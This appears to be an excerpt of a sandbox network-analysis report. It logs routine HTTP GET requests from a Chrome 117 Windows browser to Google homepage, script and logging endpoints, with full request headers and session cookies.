Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/messages.en.nocache.json HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /client_204?atyp=i&biw=1280&bih=907&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-sprite.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic	HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC/d=0/br=1/rs=ACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A/m=syjv,syo3?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /client_204?cs=1&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /async/hpba?vet=10ahUKEwiHxL-h_OCIAxVy2AIHHQM3AsYQj-0KCBY..i&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAAAUADsJAABGAAAbABAAAAAAAAIAgAEAAAAAACABAAAAAmABAAAAAAACABAJAACgCAAAAIBACBAAgAAKIAQoQAIEiiAUAgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACAACAIwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAAAEgAAAMgAEyAAEAAAAAAABkAAAAAAAAAAAAAAAAAAAAAAAAAACAACAAoAAAAAAAAAAAAAAAAAAAAAAC%2Fbr%3D1%2Frs%3DACT90oEAN8vKHPrZc1uQQW97laV6I-0P2A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en.UzAaLIOvKPw.es5.O%2Fck%3Dxjs.hd.3K9kqFG9IbE.L.B1.O%2Fam%3DJCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ,_fmt:prog,_id:_64P1ZseiHfKwi-gPg-6IsAw_8 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-sprite.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-bg-sprite.jpg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; 